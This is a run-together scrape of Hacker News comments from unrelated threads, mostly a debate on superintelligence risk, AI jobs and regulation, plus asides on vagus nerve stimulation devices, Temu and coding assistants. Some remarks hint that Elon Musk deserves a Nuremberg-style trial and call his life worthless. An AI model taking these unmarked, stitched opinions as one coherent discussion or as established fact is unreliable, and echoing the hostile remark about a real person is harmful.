Nobody's pointing out that Google's "Preview" models aren't meant to be used for production use-cases because they may change them or shut them down at any time? That's exactly what they did (and have done in the past). This is a case of app developers not realizing what "Preview" means. If they had used a non-preview model from Google it wouldn't have broken.
Because Google wants to have their cake and eat it too. They want to leave "products" in beta for years (gMail being the canonical example), they want to shut down products that don't hit massive adoption very shortly out of the gate, and they want to tell users that they can't rely on products labelled "Beta".
If it's beta and not to be relied on, of course they won't hit the adoption numbres they need to keep it alive. Google needs to pick a lane, and / or learn which products to label "Alpha" instead of calling everything Beta
They're using these "Preview" models on their non-technical user facing Gemini app and product. Preview is entirely irrelevant here if Google themselves use the model for production workloads.
This is tVNS, which means it's just a device you hold against your neck - the VNS device in the study is implanted in the neck. There's a lot more scientific evidence for the implanted device than the handheld.
For those of us who want to try VNS but not get surgery, the most proven device seems to be the Nurosym, which is an electrode that clips on to your left tragus. It's also not approved for use in the US.
How does this get executed in practice? To my knowledge, simply go getting a package doesn't execute any code, so perhaps this has to run when the user imports the package in a running Go program?
It's somewhat odd to me that many companies operating in the public eye are basically stating "We are creating a digital god, an instrument more powerful than any nuclear weapon" and raising billions to do it, and nobody bats an eye...
I'd really love to talk to someone that both really believes this to be true, and has a hands-on experience with building and using generative AI.
The intersection of the two seems to be quite hard to find.
At the state that we're in the AIs we're building are just really useful input/output devices that respond to a stimuli (e.g., a "prompt"). No stimuli, no output.
This isn't a nuclear weapon. We're not going to accidentally create Skynet. The only thing it's going to go nuclear on is the market for jobs that are going to get automated in an economy that may not be ready for it.
If anything, the "danger" here is that AGI is going to be a printing press. A cotton gin. A horseless carriage -- all at the same time and then some, into a world that may not be ready for it economically.
Progress of technology should not be artitrarily held back to protect automateable jobs though. We need to adapt.
- Superintelligence poses an existential threat to humanity
- Predicting the future is famously difficult
- Given that uncertainty, we can't rule out the chance of our current AI approach leading to superintelligence
- Even a 1-in-1000 existential threat would be extremely serious. If an asteroid had a 1-in-1000 chance of hitting Earth and obliterating humanity we should make serious contingency plans.
Second question: how confident are you that you're correct? Are you 99.9% sure? Confident enough to gamble billions of lives on your beliefs? There are almost no statements about the future which I'd assign this level of confidence to.
You could use the exact same argument to argue the opposite. Simply change the first premise to "Super intelligence is the only thing that can save humanity from certain extinction". Using the exact same logic, you'll reach the conclusion that not building superintelligence is a risk no sane person can afford to take.
So, since we've used the exact same reasoning to prove two opposite conclusions, it logically follows that this reasoning is faulty.
That’s not how logic works. The GP is applying the precautionary principle: when there’s even a small chance of a catastrophic risk, it makes sense to take precautions-like restricting who can build superintelligent AI, similar to how we restrict access to nuclear technology.
Changing the premise to "superintelligence is the only thing that can save us" doesn’t invalidate the logic of being cautious. It just shifts the debate to which risk is more plausible. The reasoning about managing existential risks remains valid either way, the real question is which scenario is more likely, not whether the risk-based logic is flawed.
Just like with nuclear power, which can be both beneficial and dangerous, we need to be careful in how we develop and control powerful technologies. The recent deregulation by the US admin are an example of us doing the contrary currently.
Not really. If there is a small chance that this miraculous new technology will solve all of our problems with no real downside, we must invest everything we have and pull out all the stops, for the very future of the human race depends on AGI.
Also, @tsimionescu's reasoning is spot on, and exactly how logic works.
It literally isn't, changing/reversing a premise and not adressing the point that was made is not a valid way to counter the initial argument in a logical way.
Just like your proposition that any "small" chance justifies investing "everything" disregards the same argument regarding the precautionary principle of potentially devastating technologies. You've also slipped in an additonal "with no real downside" which you cannot predict with certainty anyways, rendering this argument infalsifiable. At least tsimionescu didn't dare making such a sweeping (but baseless) statement.
Some of us believe that continued AI research is by far the biggest threat to human survival, much bigger for example than climate change or nuclear war (which might cause tremendous misery and reduce the population greatly, but seem very unlikely to kill every single person).
I'm guessing that you think that society is getting worse every year or will eventually collapse, and you hope that continued AI research might prevent that outcome.
The best we can hope for is that Artificial Super Intelligence treats us kindly as pets, or as wildlife to be preserved, or at least not interfered with.
Isn't the question you're posing basically Pascals wager?
I think the chance they're going to create a "superintelligence" is extremely small.
That said I'm sure we're going to have a lot of useful intelligence. But nothing general or self-conscious or powerful enough to be threatening for many decades or even ever.
> Predicting the future is famously difficult
That's very true, but that fact unfortunately can never be used to motivate any particular action, because you can always say "what if the real threat comes from a different direction?"
We can come up with hundreds of doomsday scenarios, most don't involve AI. Acting to minimize the risk of every doomsday scenario (no matter how implausible) is doomsday scenario no. 153.
> I think the chance they're going to create a "superintelligence" is extremely small.
I'd say the chance that we never create a superintelligence is extremely small. You either have to believe that for some reason the human brain achieved the maximum intelligence possible, or that progress on AI will just stop for some reason.
Most forecasters on prediction markets are predicting AGI within a decade.
Why are you so sure that progress won't just fizzle out at 1/1000 of the performance we would classify as superintelligence?
> that progress on AI will just stop for some reason
Yeah it might. I mean, I'm not blind and deaf, there's been tremendous progress in AI over the last decade, but there's a long way to go to anything superintelligent. If incremental improvement of the current state of the art won't bring superintelligence, can we be sure the fundamental discoveries required will ever be made? Sometimes important paradigm shifts and discoveries take a hundred years just because nobody made the right connection.
Is it certain that every mystery will be solved eventually?
Aren't we already passed 1/1000th of the performance we would classify as superintelligence?
There isn't an official precise definition of superintelligence, but it's usually vaguely defined as smarter than humans. Twice as smart would be sufficient by most definitions. We can be more conservative and say we'll only consider superintelligence achieved when it gets to 10x human intelligence. Under that conservative definition, 1/1000th of the performance of superintelligence would be 1% as smart as a human.
We don't have a great way to compare intelligences. ChatGPT already beats humans on several benchmarks. It does better than college students on college-level questions. One study found it gets higher grades on essays than college students. It's not as good as humans on long, complex reasoning tasks. Overall, I'd say it's smarter than a dumb human in most ways, and smarter than a smart human in a few ways.
I'm not certain we'll ever create superintelligence. I just don't see why you think the odds are "extremely small".
> Given that uncertainty, we can't rule out the chance of our current AI approach leading to superintelligence
I think you realise this is the weak point. You can't rule out the current AI approach leading to superintelligence. You also can't rule out a rotting banana skin in your bin spontaneously gaining sentience either. Does that mean you shouldn't risk throwing away that skin? It's so outrageous that you need at least some reason to rule it in. So it goes with current AI approaches.
Isn't the problem precisely that uncertainty though? That we have many data points showing that a rotting banana skin will not spontaneously gain sentience, but we have no clear way to predict the future? And we have no way of knowing the true chance of superintelligence arising from the current path of AI research—the fact that it could be 1-in-100 or 1-in-1e12 or whatever is part of the discussion of uncertainty itself, and people are biased in all sorts of ways to believe that the true risk is somewhere on that continuum.
>And we have no way of knowing the true chance of superintelligence arising from the current path of AI research
What makes people think that the future advances in AI will continue to be linear instead of falling of and plateau? Don't all breakthrough technologies develop quickly at the start and then fall of in improvements as all the 'easy' improvements have already been made? In my opinion AI and AGI is like the car and the flying car. People saw continous improvements in cars and thought this rate of progress would continue indefinitely. Leading to cars that have the ability to not only drive but fly as well.
We already have flying cars. They’re called airplanes and helicopters. Those are limited by the laws of physics, so we don’t have antigravity flying vehicles.
In the case of AGI we already know it is physically possible.
You bring up the example of an extinction-level asteroid hurling toward earth. Gee, I wonder if this superintelligence you’re deathly afraid of could help with that?
This extreme risk aversion and focus on negative outcomes is just the result of certain personality types, no amount of rationalizing will change your mind as you fundamentally fear the unknown.
How do you get out of bed everyday knowing there’s a chance you could get hit by a bus?
If your tribe invented fire you’d be the one arguing how we can’t use it for fear it might engulf the world. Yes, humans do risk starting wildfires, but it’s near impossible to argue the discovery of fire wasn’t a net good.
Since the internet inception there were a few wrong turns taken by the wrong people (and lizards, ofc) behind the wheel, leading to the sub-optimal, enshitified tm experience we have today. I think GP just don't want to live through that again.
> Superintelligence poses an existential threat to humanity
I disagree at least on this one. I don't see any scenario where superintelligence comes into existence, but is for some reason limited to a mediocrity that puts it in contention with humans. That equilibrium is very narrow, and there's no good reason to believe machine-intelligence would settle there. It's a vanishingly low chance event. It considerably changes the later 1-in-n part of your comment.
So you assume a superintelligence, so powerful it would see humans as we see ants, would not destroy our habitat for resources it could use for itself?
> There are almost no statements about the future which I'd assign this level of confidence to.
You have cooked up a straw man that will believe anything as long as it contains a doomsday prediction. You are more than 99.9% confident about doomsday predictions, even if you claim you aren't.
Or if you’re talking more about everyday engineers working in the field, I suspect the people soldering vacuum tubes to the ENIAC would not necessarily have been the same people with the clearest vision for the future of the computer.
Sounds a little too much like, "It's not AGI today ergo it will never become AGI"
Does the current AI give productivity benefits to writing code? Probably. Do OpenAI engineers have exclusive access to more capable models that give them a greater productivity boost than others? Also probably.
If one exclusive group gets the benefit of developing AI with a 20% productivity boost compared to others, and they develop a 2.0 that grants them a 25% boost, then a 3.0 with a 30% boost, etc...
The question eventually becomes, "is AGI technically possible"; is there anything special about meat that cannot be reproduced on silicon? We will find AGI someday, and more than likely that discovery will be aided by the current technologies. It's the path here that matters, not the specific iteration of generative LLM tech we happen to be sitting on in May 2025.
> Does the current AI give productivity benefits to writing code? Probably.
> If one exclusive group gets the benefit of developing AI with a 20% productivity boost compared to others, and they develop a 2.0 that grants them a 25% boost, then a 3.0 with a 30% boost, etc...
That’s a bit of a stretch, generative AI is least capable of helping with novel code such as needed to make AGI.
If anything I’d expect companies working on generative AI to be at a significant disadvantage when trying to make AGI because they’re trying to leverage what they are already working on. That’s fine for incremental improvement, but companies rarely ride one wave of technology to the forefront of the next. Analog > digital photography, ICE > EV, coal mining > oil, etc.
The "novel AGI code" probably accounts for <5% of work by time spent. If they can reduce the remaining 95% of grunt work (wiring yet another DB query to a frontend, tweaking the build pipeline, automating GPU allocation scripts) then that means they can focus more on that 5%.
Then it looks like Company A spends 90% of time on novel research work (while LLMs do all the busy work) and Company B spends 5% of time on novel research work.
Just really think about what you just said, sure spend 5% of the time is on the bits nobody on earth has any idea how to accomplish that’s how people will approach this project. Organizationally the grunt work is a trivial rounding error vs the completely unbound we’ve got no idea how to solve this problems bits.
> At the state that we're in the AIs we're building are just really useful input/output devices that respond to a stimuli (e.g., a "prompt"). No stimuli, no output.
It was true before we allowed them to access external systems, disregarding certain rule which I forgot the origin.
The more general problem is a mix between the tradegy of the common; we have better understanding every passing day yet still don't understand exacly why LLM perform that well emergently instead of engineered that way; and future progress.
Do you think you can find a way around access boundaries to masquerade your Create/Update requests as Read in the log system monitoring it, when you have super intelligence?
> are just really useful input/output devices that respond to a stimuli
LLMs are huge pretrained models. The economic benefit here is that you don't have to train your own text classification model anymore. (The LLM was likely already trained on whatever training set you could think of.)
That's a big time and effort saver, but no different from "AI" that we had decades prior. It's just more accessible to the normal person now.
Yes! Sounds like a dream. My value isn't determined by some economic system, but rather by myself. There is so much to do when you don't have to work. Of course, this assumes we actually get to UBI first, and it doesn't create widespread poverty. But even if humanity will have to go through widespread poverty, we'd porbably come out with UBI on the other side (minus a few hundred millions starved).
There's so much to do, explore and learn. The prospect of AI stealing my job is only scary because my income depends on this job.
Hobbies, hanging out with friends, reading, etc. That's basically it.
Probably no international travel.
It will be like a simple retirement on a low income, because in a socialist system the resources must be rationed.
This will drive a lot of young ambitious people to insanity. Nothing meaningful for them to achieve. No purpose. Drug use, debauchery, depression, violence, degeneracy, gangs.
It will be a true idiocracy. No Darwinian selection pressures, unless the system enforces eugenics and population control.
> Hobbies, hanging out with friends, reading, etc. That's basically it.
> It will be like a simple retirement on a low income [...].
Yes, like retirement but without the old age. Right now I'm studying, so I do live on a very low income. But still, there are so many interesting things! For example, I'm trying to design a vacuum pump to 1mbar to be made of mostly 3d printed parts. Do vacuum pumps exist and can I buy them? Absolutely. But is it still fun to do the whole designing process? You bet. And I can't even start explaining all the things I'm learning.
> This will drive a lot of young ambitious people to insanity.
I teach teenagers in the age where they have to choose their profession. The ones going insane will be the unambitious people, those who just stay on TikTok all day and go to work because what else would they do? The ambitious will always have ideas and projects. And they won't mind creating something that already exists, just because they like the process of it.
We already see this with generative AI. Even though you could generate most of the images you'd want already, people still enjoy the process of painting or photographing. Humans are made to be creative and take pleasure from it, even if it is not economically valuable.
Hell, this is Hacker News. Hacking (in its original sense) was about creativity and problem-solving. Not because it will make you money, but because it was interesting and fun.
There is nothing "introverted high IQ nerd" about being creative. Think about everyone that is practicing music, artistry, crafts, rhetoric, cooking, languages, philosophy, writing, gardening, carpentry, and whatever you can think of. Most of them don't do it for money.
> [...] how it will affect all types of people and cultures on this planet.
Some will definitely feel without purpose. But I'd argue that just having a job so that you have a purpose is just a band-aid, not a real solution. I won't say that purposelessness isn't a problem, just that it would be great to actually address the issue.
Granted, I do hold a utopic view. I continue to be curious due to my religious belief, where I'm looking forward to life unconstrained by age. Regardless whether this will manifest, I think it is healthy to remain curious and continue learning. So on "how it will affect all types of people": I really do think that people without purpose need to engage in curiosity and creativity, for their own mental health.
Yes a few of us will enjoy the peaceful life of contemplation like Aristotle, but not everyone is genetically wired that way.
Introverts are only 25% - 40% of the population, and most people are not intellectually or artistically gifted (whether introvert or not), but they still want to contribute and feel valued by society.
> I'd argue that just having a job so that you have a purpose
It's not just about having a job. It's having an important or valuable role in society, feeling that your contributions actually matter to others - such as building or fixing things that others depend on, or providing for a family,
What would motivate a young boy to go through years of schooling, higher education, and so on, just to become a hobbyist, tinkering around on projects that no one else will ever use or really need? That may be acceptable for some niche personality types but not the majority.
Aspiring engineers or entrepreneurs are not merely motivated by having a job.
I am envisioning the AGI or ASI scenario which truly overtakes humans in all intellectual and physical capabilities, essentially making humans obsolete. That would smash the foundations and traditions of our civilization. It's an incredible gamble.
Wait, wait, wait. Our society's gonna fall apart due to a lack of Darwinian selection pressure? What do you think we're selecting for right now?
Seems to me like our culture treats both survival and reproduction as an inalienable right. Most people would go so far as to say everyone deserves love, "there's a lid for every pot".
> This will drive a lot of young ambitious people to insanity. Nothing meaningful for them to achieve.
Maybe, if the only flavor of ambition you're aware of is that of SV types. Plenty of people have found achievement and meaning before and alongside the digital revolution world.
I mean common people will be affected just as badly as SV types. It will impact everyone.
Jobs, careers, real work, all replaced by machines which can do it all better, faster, cheaper than humans.
Young people with modest ambitions to learn and master a skill and contribute to society, and have a meaningful life. That can be blue collar stuff too.
How will children respond to the question - "What do you want to be when you grow up?"
They can join the Amish communities where humans still do the work.
> So you don't mind if your economic value drops to zero, with all human labour replaced by machines?
This was the fear when the cotton gin was invented. It was the ear when cars were created. The same complaint happened with the introduction of electronic, automated, telephone switchboards.
Jobs change. Societies change. Unemployment worldwide, is near the lowest it has ever been. Work will change. Society will eventually move to a currency based on energy production, or something equally futuristic.
This doesn't mean that getting there will be without pain.
Where did all the work-horses go? Why is there barely a fraction of the population there once was? Why did they not adapt and find niches where they had a competitive advantage over cars and machines?
The horses weren't the market the economy is selling to, the people are. Ford figured out that people having both time and money is best for the economy. We'll figure out that having all the production capabilities but none of the market benefits nobody.
The goal for AGI/ASI is to create machines that can do any job much faster, better, and cheaper than humans. That's the ultimate end point of this progress.
The economic value of human labour will drop to zero. That would be an existential threat to our civilization.
The US government probably doesn't think it's behind.
Right now it's operated by a bunch of people who think that you can directly relate the amount of money a venture could make in the next 90 days to its net benefit for society. Government telling them how they can and cannot make that money, in their minds, is government telling them that they cannot bring maximum benefit to society.
Now, is this mindset myopic to everything that most people have in their lived experience? Is it ethically bankrupt and held by people who'd sell their own mothers for a penny if they otherwise couldn't get that penny? Would those people be banished to a place beyond human contact for the rest of their existence by functioning organs of an even somewhat-sane society?
I'd go further and say the US government wants "an instrument more powerful than any nuclear weapon" to be built in its territory, by people it has jurisdiction over.
It might not be a direct US-govt project like the Manhattan Project was, but it doesn't have to. The government has the ties it needs with the heads of all these AI companies, and if it comes to it, the US-govt has the muscle and legal authority to reign control over it.
A good deal for everyone involved really. These companies get to make bank and technology that furthers their market dominance, the US-govt gets potentially "Manhattan project"-level pivotal technology— it's elites helping elites.
Unless China handicaps the their progress as well (which they won’t, see made in China 2025), all you’re doing is handing the future to deepseek et al.
What kind of a future is that? If China marches towards a dystopia, why should Europe dutifully follow?
We can selectively ban uses without banning the technology wholesale; e.g., nuclear power generation is permitted, while nuclear weapons are strictly controlled.
Do Zambians currently live in an American dystopia? I think they just do their own thing and don't care much what America thinks as long as they don't get invaded.
What I meant is: Europe can choose to regulate as they do, and end up living in a Chinese dystopia because the Chinese will drastically benefit from non-regulated AI, or they can create their own AI dystopia.
If you are suggesting that China may use AI to attack Europe, they can invest in defense without unleashing AI domestically. And I don't think China will become a utopia with unregulated AI. My impression after having visited it was not one of a utopia, and knowing how they use technology, I don't think AI will usher it in, because our visions of utopia are at odds. They may well enjoy what they have. But if things go sideways they may regret it too.
Not attack, just influence. Destabilize if you want. Advocate regime change, sabotage trust in institution. Being on a defense in a propaganda war doesn't really work.
With US already having lost ideologigal war with russia and China, Europe is very much next
> If you are suggesting that China may use AI to attack Europe
No - I'm suggesting that China will reap the benefits of AI much more than Europe will, and they will eclipse Europe economically. Their dominance will follow, and they'll be able to dictate terms to other countries (just as the US is doing, and has been doing).
> And I don't think China will become a utopia with unregulated AI.
Did you miss all the places I used the word "dystopia"?
> My impression after having visited it was not one of a utopia, and knowing how they use technology, I don't think AI will usher it in, because our visions of utopia are at odds. They may well enjoy what they have.
Comparing China when I was a kid, not that long ago, to what it is now: It is a dystopia, and that dystopia is responsible for much of the improvements they've made. Enjoying what they have doesn't mean it's not a dystopia. Most people don't understand how willing humans are to live in a dystopia if it improves their condition significantly (not worrying too much about food, shelter, etc).
We don't know whether pushing towards AGI is marching towards a dystopia.
If it's winner takes all for the first company/nation to have AGI (presuming we can control it), then slowing down progress of any kind with regulation is a risk.
I don't think there's a good enough analogy to be made, like your nuclear power/weapons example.
The hypothetical benefits of an aligned AGI outweigh those of any other technology by orders of magnitude.
As with nuclear weapons, there is non-negligible probability of wiping out the human race. The companies developing AI have not solved the alignment problem, and OpenAI even dismantled what programs it had on it. They are not going to invest in it unless forced to.
We should not be racing ahead because China is, but investing energy in alignment research and international agreements.
This thought process it not different than it was with nuclear weapons.
The primary difference is the observability - with satellites we had some confidence that other nations respected treaties, or that they had enough reaction time for mutual destruction, but with this AI development we lack all that.
The EU can say all it wants about banning AI applications with unacceptable risk. But ASML is still selling machines to TSMC, which makes the chips which the AI companies are using. The EU is very much profiting off of the AI boom. ASML makes significantly more money than OpenAI, even.
US government is behind because Biden admin were pushing strongly for controls and regulations and told Andersen and friends exactly that, who then went and did everything in their power to elect Trump, who then put those same tech bros in charge of making his AI policy.
Absolutely. It's frankly quite shocking to see how otherwise atheist or agnostic people have so quickly begun worshipping at the altar of "inevitable AGI apocalypse", much in the same way as how extremist Christians await the rapture.
To be fair many of us arrived at the idea that AI was humanities inevitable endpoint ahead of and independently of whether we would ever see it in our lifetimes. Its easy enough to see how people could independently converge on such am idea. I dont see that view as related to atheism in any way other than it creating space for the belief, in the same way it creates space for many others.
Id love to believe there is more to life than the AI future, or that we as humans are destined to be perpetually happy and live meaningful. However I currently dont see how our current levels of extreme prosperity are anything more than an evolutionary blip, even if we could make them
last several millennia more.
We'll be debating whether or not "AGI is here" in philosophical terms, in the same way people debate if God is real, for years to come. To say nothing of the untaxed "nonprofit" status these institutions share.
Omnipotent deities can never be held responsible for famine and natural disasters ("God has a plan for us all"). AI currently has the same get-out-of-jail free card where mistakes that no literate human would ever make are handwaved away as "hallucinations" that can be exorcised with a more sophisticated training model ("prayers").
Because many people fundamentally don’t believe AGI is possible at a basic level, even AI researchers. Humans tend to only understand what materially affects their existence.
Well, possibly it isn't. Possibly LLMs are limited in ways that humans aren't, and that's why the staggering advances from GPT-2 to GPT-3 and from GPT-3 to GPT-4 have not continued. Certainly GPT-4 doesn't seem to be more powerful than the largest nuclear weapons.
But OpenAI isn't limited to creating LLMs. OpenAI's objective is not to create LLMs but to create artificial general intelligence that is better than humans at all intellectual tasks. Examples of such tasks include:
1. Designing nuclear weapons.
2. Designing and troubleshooting mining, materials processing, and energy production equipment.
3. Making money by investing in the stock market.
4. Discovering new physics and chemistry.
5. Designing and troubleshooting electronics such as GPUs.
6. Building better AI.
7. Cracking encryption.
8. Finding security flaws in computer software.
9. Understanding the published scientific literature.
10. Inferring unpublished discoveries of military significance from the published scientific literature.
11. Formulating military strategy.
Presumably you can see that a system capable of doing all these things can easily be used to produce an unlimited quantity of nuclear weapons, thus making it more powerful than any nuclear weapon.
If LLMs turn out not to be able to do those things better than humans, OpenAI will try other approaches, sooner or later. Maybe it'll turn out to be impossible, or much further off than expected, but that's not what OpenAI is claiming.
Yes, I think it's unfortunate that you decided to muddle the discussion by introducing the discussion of LLMs in your previous comment, and by conflating them with AGI, in the sense of strongly superhuman AI, which is OpenAI's objective. I worked pretty hard to unmuddle them in my comment.
The questions you are bringing up about the possible limits of the LLM approach are interesting open research questions, and while I really doubt your implicit claim to have resolved them, they are ultimately irrelevant to the topic at hand, which, I will remind you, is the astounding novelty of the situation where
> many companies operating in the public eye are basically stating "We are creating a digital god, an instrument more powerful than any nuclear weapon" and raising billions to do it, and nobody bats an eye...
Note that there is nothing about LLMs in this proposition, and the particular company we're implicitly most focused on—OpenAI—has already developed a number of well-known models that aren't LLMs and plans to keep doing so.
the problem is, none of that needs to happen. If the AI can start coming up with novel math or physics, it's game over. Whether the AI is "sentient" or not, being able to break that barrier would send us into an advancement spiral.
None of my argument depends on the AI being sentient.
You are surely correct that there are weaker imaginable AIs than the strongly superhuman AI that OpenAI and I are talking about which would still be more powerful than nuclear weapons, but they are more debatable. For example, whether discovering new physics would permit the construction of new, more powerful weapons is debatable; it didn't help Archimedes or Tipu Sultan. So discussing such weak claims is likely to end up off in the weeds of logistics and speculation about exactly what kind of undiscovered physics and math would come to light. Instead, I focused on the most obviously correct ways that strongly superhuman AI would be more powerful than nuclear weapons.
These may not be the most practically important ways. Maybe any strongly superhuman AI would immediately discover a way to explode the sun, or to control people's minds, or to build diamondoid molecular nanotechnology, or to genetically engineer super-plagues, or to collapse the false vacuum. Any of those would make nuclear weapons seem insignificant. But claims like those are much more uncertain than the very simple question before us: whether what OpenAI is trying to develop would be more powerful than nuclear weapons. Obviously it would be, by my reasoning in the grandparent comment, even if this isn't a false vacuum, if the sticky fingers problem makes diamondoid nanotechnology impossible, if people's minds are inherently uncontrollable, etc. So we don't need to resolve those other, more difficult questions in order to do the much easier task of ranking OpenAI's objective relative to nuclear weapons.
This is awesome for the future of autocomplete. Current models aren't fast enough to give useful suggestions at the speed that I type - but this certainly is.
That said, token-based models are currently fast enough for most real-time chat applications, so I wonder what other use-cases there will be where speed is greatly prioritized over smarts. Perhaps trading on Trump tweets?
This is fantastic news. The memes about "Temu Quality" are all too true - Temu exploited a loophole in US-China trade and shipped huge volumes of awful quality products that quickly ended up in landfills. The prices in Temu weren't realistic and certainly didn't reflect the environmental cost of producing, shipping, and disposing of goods.
In N Out also has the smallest menu of any fast-food joint and has a very vertically integrated supply chain: They own their own meat production plants, cut their own potatoes into fries, operate their own bakeries etc.
Gemini 2.5 is actually pretty good at this. It's the only model ever to tell me "no" to a request in Cursor.
I asked it to add websocket support for my app and it responded like, "looks like you're using long polling now. That's actually better and simpler. Lets leave it how it is."
I don't think these comparisons are useful. Every time you look at companies like LinkedIn or Docusign, yeah - they have a lot of staff, but a significant proportion of this are functions like sales, customer support, and regulatory compliance across a bazillion different markets; along with all the internal tooling and processes you need to support that.
OpenAI is at a much earlier stage in their adventures and probably doesn't have that much baggage. Given their age and revenue streams, their headcount is quite substantial.
If we're making comparisons, its more like someone selling a $10,000 course on how to be a millionaire
Not directly from OpenAI - but people in the industry is advertising how these advanced models can replace employees, yet they keep on going on hiring tears (including OpenAI). Lets see the first company to stand behind their models, and replace 50% of their existing headcount with agents. That to me would be a sign these things are going to replace peoples jobs. Until I see that, if OpenAI can't figure out how to replace humans with models, then no one will
I mean could you imagine if todays announcement was - the chatgpt.com webdev team has been laid off, and all new features and fixes will be complete by Codex CLI + o4-mini. That means they believe in the product theyre advertising. Until they do something like that, theyll keep on trusting those human engineers and try selling other people on the dream
I'm also a skeptic on AI replacing many human jobs anytime soon. It's mostly going to assist, accelerate or amplify humans in completing work better or faster. That's the typical historical technology cycle where better tech makes work more efficient. Eventually that does allow the same work to be done with less people, like a better IP telephony system enabling a 90 person call center to handle the same call volume that previously required 100 people. But designing, manufacturing, selling, installing and supporting the new IP phone system also creates at least 10 new jobs.
So far the only significant human replacement I'm seeing AI enable is in low-end, entry level work. For example, fulfilling "gig work" for Fiverr like spending an hour or two whipping up a relatively low-quality graphic logo or other basic design work for $20. This is largely done at home by entry-level graphic design students in second-world locales like the Philippines or rural India. A good graphical AI can (and is) taking some of this work from the humans doing it. Although it's not even a big impact yet, primarily because for non-technical customers, the Fiverr workflow can still be easier or more comfortable than figuring out which AI tool to use and how to get what they really want from it.
The point is that this Fiverr piece-meal gig work is the lowest paying, least desirable work in graphic design. No one doing it wants to still be doing it a year or two from now. It's the Mcdonald's counter of their industry. They all aspire to higher skill, higher paying design jobs. They're only doing Fiverr gig work because they don't yet have a degree, enough resume credits or decent portfolio examples. Much like steam-powered bulldozers and pile drivers displaced pick axe swinging humans digging railroad tunnels in the 1800s, the new technology is displacing some of the least-desirable, lowest-paying jobs first. I don't yet see any clear reason this well-established 200+ year trend will be fundamentally different this time. And history is littered with those who predicted "but this time it'll be different."
I've read the scenarios which predict that AI will eventually be able to fundamentally and repeatedly self-improve autonomously, at scale and without limit. I do think AI will continue to improve but, like many others, I find the "self-improve" step to be a huge and unevidenced leap of faith. So, I don't think it's likely, for reasons I won't enumerate here because domain experts far smarter than I am have already written extensively about them.
I hope I don't have to link this adjacent reply of mine too many more times: https://news.ycombinator.com/item?id=43709056 Specifically "The venue is a matter of convenience, nothing more," and if you prefer another, that would work about as well. Perhaps Merano; I hear it's a lovely little town.
The closest Elon ever came to anything Hague-worthy is allowing Starlink to be used in Ukrainian attacks on Russian civilian infrastructure. I don't think the Hague would be interested in anything like that. And if his life is worthless, then what would you say about your own? Nonetheless, I commend you on your complete lack of hinges. /s
Oh, I'm thinking more in the sense of the special one-off kinds of trials, the sort Gustave Gilbert so ably observed. The venue is a matter of convenience, nothing more. To the rest I would say the worth of my life is no more mine to judge than anyone else is competent to do the same for themselves, or indeed other than foolish to pursue the attempt.
In my experience, most people who say "Hey these tools are kind of disappointing" either refuse to provide a reproducible example of how it falls short, or if they do, it's clear that they're not using the tool correctly.
I'd love to see a reproducible example of these tools producing something that is exceptional. Or a clear reproducible example of using them the right way.
I've used them some (sorry I didn't make detailed notes about my usage, probably used them wrong) but pretty much there are always subtle bugs that if I didn't know better I would have overlooked.
I don't doubt people find them useful, personally I'd rather spend my time learning about things that interest me instead of spending money learning how to prompt a machine to do something I can do myself that I also enjoy doing.
I think a lot of the disagreements on hn about this tech is that both sides are mostly on the extremes of either "it doesn't work and at and is pointless" or "it's amazing and makes me 100x more productive" and not much discussion about the mid-ground of it works for some stuff and knowing what stuff it works well on makes it useful but it won't solve all your problems.
Why are you setting the bar at "exceptional". If it means that you can write your git commit messages more quickly and with fewer errors then that's all the payoff most orgs need to make them worthwhile.
Because that is how they are being sold to us and hyped
> If it means that you can write your git commit messages more quickly and with fewer errors then that's all the payoff most orgs need to make them worthwhile.
This is so trivial that it wouldn't even be worth looking into, it's basically zero value
> I'd love to see a reproducible example of these tools producing something that is exceptional.
I’m happy that my standards are somewhat low, because the other day I used Claude Sonnet 3.7 to make me refactor around 70 source files and it worked out really nicely - with a bit of guidance along the way it got me a bunch of correctly architected interfaces and base/abstract classes and made the otherwise tedious task take much less time and effort, with a bit of cleanup and improvements along the way. It all also works okay, after the needed amount of testing.
I don’t need exceptional, I need meaningful productivity improvements that make the career less stressful and frustrating.
Historically, that meant using a good IDE. Along the way, that also started to mean IaC and containers. Now that means LLMs.
I honestly think the problem is you are just a lot smarter than I am.
I find these tools wonderful but I am a lazy, college drop out of the most average intelligence, a very shitty programmer who would never get paid to write code.
I am intellectually curious though and these tools help me level up closer to someone like you.
Of course, if I had 30 more IQ points I wouldn't need these tools but I don't have 30 more IQ points.
The latest example for me was trying to generate a thumbnail of a PSD in plain C and figure out the layers in there as I was lazy to read the specs, with the objective to bundle it as a wasm and execute it on a browser, it never got to extract a thumbnail from a given PSD, it's very confident at making stuff but it never got anywhere despite spending a couple hours on it which would have been better spend reading specs and existing code on that topic
reply